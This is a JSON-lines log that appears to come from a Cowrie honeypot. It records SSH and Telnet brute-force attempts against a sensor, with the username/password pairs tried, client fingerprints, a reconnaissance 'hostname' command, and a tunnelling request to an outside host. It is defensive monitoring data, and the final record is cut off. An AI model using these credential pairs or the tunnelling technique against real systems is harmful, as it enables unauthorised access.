{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:57:03.110042Z","src_ip":"212.227.125.160","session":"76c9a9a8475e"}
{"eventid":"cowrie.session.closed","duration":13.72255802154541,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:03.413939Z","src_ip":"212.227.125.160","session":"4680cf78caaf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59854,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a6a5852e138","protocol":"telnet","message":"New connection: 212.227.125.160:59854 (1.2.3.4:23) [session: 1a6a5852e138]","sensor":"my-vps","timestamp":"2025-08-31T03:57:03.590118Z"}
{"eventid":"cowrie.session.closed","duration":13.769101858139038,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:04.666762Z","src_ip":"212.227.125.160","session":"54ac23f2263d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59857,"dst_ip":"1.2.3.4","dst_port":23,"session":"860fdb8a146a","protocol":"telnet","message":"New connection: 212.227.125.160:59857 (1.2.3.4:23) [session: 860fdb8a146a]","sensor":"my-vps","timestamp":"2025-08-31T03:57:04.899947Z"}
{"eventid":"cowrie.login.failed","username":"master","password":"P@ssw0rd123","message":"login attempt [master/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:57:05.255823Z","src_ip":"212.227.125.160","session":"76c9a9a8475e"}
{"eventid":"cowrie.session.closed","duration":"69.6","message":"Connection lost after 69.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:06.084584Z","src_ip":"212.227.235.229","session":"47c01d3c2277"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:07.068362Z","src_ip":"212.227.125.160","session":"76c9a9a8475e"}
{"eventid":"cowrie.session.closed","duration":12.812937259674072,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:08.564360Z","src_ip":"182.119.206.115","session":"0293aa81ad0c"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":54316,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a4d4ccc583d","protocol":"telnet","message":"New connection: 182.119.206.115:54316 (1.2.3.4:23) [session: 6a4d4ccc583d]","sensor":"my-vps","timestamp":"2025-08-31T03:57:08.706489Z"}
{"eventid":"cowrie.login.success","username":"root","password":"669703da61","message":"login attempt [root/669703da61] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:57:08.775774Z","src_ip":"201.148.180.50","session":"d05ca32473ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:57:11.545004Z","src_ip":"201.148.180.50","session":"d05ca32473ed"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T03:57:11.545672Z","src_ip":"201.148.180.50","session":"d05ca32473ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:13.068014Z","src_ip":"201.148.180.50","session":"d05ca32473ed"}
{"eventid":"cowrie.session.closed","duration":"12.5","message":"Connection lost after 12.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:13.069116Z","src_ip":"201.148.180.50","session":"d05ca32473ed"}
{"eventid":"cowrie.session.closed","duration":13.53548526763916,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:16.433878Z","src_ip":"212.227.125.160","session":"78ad9fe43d5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60049,"dst_ip":"1.2.3.4","dst_port":23,"session":"2eacda7d2a7c","protocol":"telnet","message":"New connection: 212.227.125.160:60049 (1.2.3.4:23) [session: 2eacda7d2a7c]","sensor":"my-vps","timestamp":"2025-08-31T03:57:16.673939Z"}
{"eventid":"cowrie.session.closed","duration":14.147869348526001,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:17.737917Z","src_ip":"212.227.125.160","session":"1a6a5852e138"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60060,"dst_ip":"1.2.3.4","dst_port":23,"session":"8b3c64475703","protocol":"telnet","message":"New connection: 212.227.125.160:60060 (1.2.3.4:23) [session: 8b3c64475703]","sensor":"my-vps","timestamp":"2025-08-31T03:57:18.042694Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55352,"dst_ip":"1.2.3.4","dst_port":22,"session":"72687046e1a1","protocol":"ssh","message":"New connection: 212.227.235.229:55352 (1.2.3.4:22) [session: 72687046e1a1]","sensor":"my-vps","timestamp":"2025-08-31T03:57:18.369063Z"}
{"eventid":"cowrie.session.closed","duration":14.0932776927948,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:18.993158Z","src_ip":"212.227.125.160","session":"860fdb8a146a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60069,"dst_ip":"1.2.3.4","dst_port":23,"session":"10adc3e07408","protocol":"telnet","message":"New connection: 212.227.125.160:60069 (1.2.3.4:23) [session: 10adc3e07408]","sensor":"my-vps","timestamp":"2025-08-31T03:57:19.260291Z"}
{"eventid":"cowrie.session.closed","duration":12.796568632125854,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:21.502977Z","src_ip":"182.119.206.115","session":"6a4d4ccc583d"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":54601,"dst_ip":"1.2.3.4","dst_port":23,"session":"f503c4093b2b","protocol":"telnet","message":"New connection: 182.119.206.115:54601 (1.2.3.4:23) [session: f503c4093b2b]","sensor":"my-vps","timestamp":"2025-08-31T03:57:21.714640Z"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-31T03:57:23.901039Z","src_ip":"212.227.125.160","session":"660eddac5889"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:57:24.271174Z","src_ip":"212.227.235.229","session":"72687046e1a1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:57:24.272448Z","src_ip":"212.227.235.229","session":"72687046e1a1"}
{"eventid":"cowrie.session.closed","duration":"41.1","message":"Connection lost after 41.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:27.223758Z","src_ip":"212.227.125.160","session":"660eddac5889"}
{"eventid":"cowrie.session.closed","duration":14.153321266174316,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:30.827163Z","src_ip":"212.227.125.160","session":"2eacda7d2a7c"}
{"eventid":"cowrie.session.closed","duration":13.47482943534851,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:31.517424Z","src_ip":"212.227.125.160","session":"8b3c64475703"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60268,"dst_ip":"1.2.3.4","dst_port":23,"session":"80411b9d3f16","protocol":"telnet","message":"New connection: 212.227.125.160:60268 (1.2.3.4:23) [session: 80411b9d3f16]","sensor":"my-vps","timestamp":"2025-08-31T03:57:31.711903Z"}
{"eventid":"cowrie.session.closed","duration":13.478519201278687,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:32.738744Z","src_ip":"212.227.125.160","session":"10adc3e07408"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60274,"dst_ip":"1.2.3.4","dst_port":23,"session":"de87832612d9","protocol":"telnet","message":"New connection: 212.227.125.160:60274 (1.2.3.4:23) [session: de87832612d9]","sensor":"my-vps","timestamp":"2025-08-31T03:57:33.031708Z"}
{"eventid":"cowrie.session.closed","duration":12.817858934402466,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:34.532431Z","src_ip":"182.119.206.115","session":"f503c4093b2b"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":54922,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d0833b76f77","protocol":"telnet","message":"New connection: 182.119.206.115:54922 (1.2.3.4:23) [session: 3d0833b76f77]","sensor":"my-vps","timestamp":"2025-08-31T03:57:34.809484Z"}
{"eventid":"cowrie.session.connect","src_ip":"34.14.223.46","src_port":58214,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad6bc96b2936","protocol":"ssh","message":"New connection: 34.14.223.46:58214 (1.2.3.4:22) [session: ad6bc96b2936]","sensor":"my-vps","timestamp":"2025-08-31T03:57:35.509078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:57:35.512975Z","src_ip":"34.14.223.46","session":"ad6bc96b2936"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:57:35.777922Z","src_ip":"34.14.223.46","session":"ad6bc96b2936"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-31T03:57:36.056587Z","src_ip":"212.227.235.229","session":"72687046e1a1"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-31T03:57:38.021111Z","src_ip":"34.14.223.46","session":"ad6bc96b2936"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60262,"dst_ip":"1.2.3.4","dst_port":23,"session":"db91187fb0a4","protocol":"telnet","message":"New connection: 212.227.125.160:60262 (1.2.3.4:23) [session: db91187fb0a4]","sensor":"my-vps","timestamp":"2025-08-31T03:57:38.031207Z"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:39.289244Z","src_ip":"34.14.223.46","session":"ad6bc96b2936"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54562,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cf800435b2a","protocol":"ssh","message":"New connection: 212.227.235.229:54562 (1.2.3.4:22) [session: 6cf800435b2a]","sensor":"my-vps","timestamp":"2025-08-31T03:57:40.091883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:57:41.208635Z","src_ip":"212.227.235.229","session":"6cf800435b2a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:57:41.209496Z","src_ip":"212.227.235.229","session":"6cf800435b2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47350,"dst_ip":"1.2.3.4","dst_port":22,"session":"8abfc939300d","protocol":"ssh","message":"New connection: 212.227.125.160:47350 (1.2.3.4:22) [session: 8abfc939300d]","sensor":"my-vps","timestamp":"2025-08-31T03:57:41.463099Z"}
{"eventid":"cowrie.session.closed","duration":"27.0","message":"Connection lost after 27.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:45.330910Z","src_ip":"212.227.235.229","session":"72687046e1a1"}
{"eventid":"cowrie.session.closed","duration":14.106261253356934,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:45.818092Z","src_ip":"212.227.125.160","session":"80411b9d3f16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60504,"dst_ip":"1.2.3.4","dst_port":23,"session":"992d5ba2c146","protocol":"telnet","message":"New connection: 212.227.125.160:60504 (1.2.3.4:23) [session: 992d5ba2c146]","sensor":"my-vps","timestamp":"2025-08-31T03:57:46.039546Z"}
{"eventid":"cowrie.session.closed","duration":13.382947206497192,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:46.414578Z","src_ip":"212.227.125.160","session":"de87832612d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60564,"dst_ip":"1.2.3.4","dst_port":23,"session":"118daa5763c3","protocol":"telnet","message":"New connection: 212.227.125.160:60564 (1.2.3.4:23) [session: 118daa5763c3]","sensor":"my-vps","timestamp":"2025-08-31T03:57:46.612981Z"}
{"eventid":"cowrie.login.failed","username":"master","password":"letmein","message":"login attempt [master/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T03:57:47.105178Z","src_ip":"212.227.235.229","session":"6cf800435b2a"}
{"eventid":"cowrie.session.closed","duration":13.297670602798462,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:48.107089Z","src_ip":"182.119.206.115","session":"3d0833b76f77"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":55238,"dst_ip":"1.2.3.4","dst_port":23,"session":"8353de7c4179","protocol":"telnet","message":"New connection: 182.119.206.115:55238 (1.2.3.4:23) [session: 8353de7c4179]","sensor":"my-vps","timestamp":"2025-08-31T03:57:48.263690Z"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:48.902108Z","src_ip":"212.227.235.229","session":"6cf800435b2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42561,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed82454c4e67","protocol":"ssh","message":"New connection: 212.227.235.229:42561 (1.2.3.4:22) [session: ed82454c4e67]","sensor":"my-vps","timestamp":"2025-08-31T03:57:49.531023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:57:49.532011Z","src_ip":"212.227.235.229","session":"ed82454c4e67"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:57:49.779163Z","src_ip":"212.227.235.229","session":"ed82454c4e67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49404,"dst_ip":"1.2.3.4","dst_port":22,"session":"174b7f7a6342","protocol":"ssh","message":"New connection: 212.227.125.160:49404 (1.2.3.4:22) [session: 174b7f7a6342]","sensor":"my-vps","timestamp":"2025-08-31T03:57:49.968033Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:49.969385Z","src_ip":"212.227.125.160","session":"174b7f7a6342"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49704,"dst_ip":"1.2.3.4","dst_port":22,"session":"17923d5586be","protocol":"ssh","message":"New connection: 212.227.125.160:49704 (1.2.3.4:22) [session: 17923d5586be]","sensor":"my-vps","timestamp":"2025-08-31T03:57:50.079492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:57:50.080270Z","src_ip":"212.227.125.160","session":"17923d5586be"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T03:57:50.192595Z","src_ip":"212.227.125.160","session":"17923d5586be"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:57:50.530870Z","src_ip":"212.227.125.160","session":"17923d5586be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T03:57:50.645223Z","session":"17923d5586be"}
{"eventid":"cowrie.login.failed","username":"cc","password":"123456","message":"login attempt [cc/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:57:50.812407Z","src_ip":"212.227.235.229","session":"ed82454c4e67"}
{"eventid":"cowrie.session.closed","duration":13.882153034210205,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:51.913304Z","src_ip":"212.227.125.160","session":"db91187fb0a4"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:52.062706Z","src_ip":"212.227.235.229","session":"ed82454c4e67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60636,"dst_ip":"1.2.3.4","dst_port":23,"session":"d0a2dbb74bc3","protocol":"telnet","message":"New connection: 212.227.125.160:60636 (1.2.3.4:23) [session: d0a2dbb74bc3]","sensor":"my-vps","timestamp":"2025-08-31T03:57:52.096868Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:57:53.382015Z","src_ip":"212.227.125.160","session":"8abfc939300d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh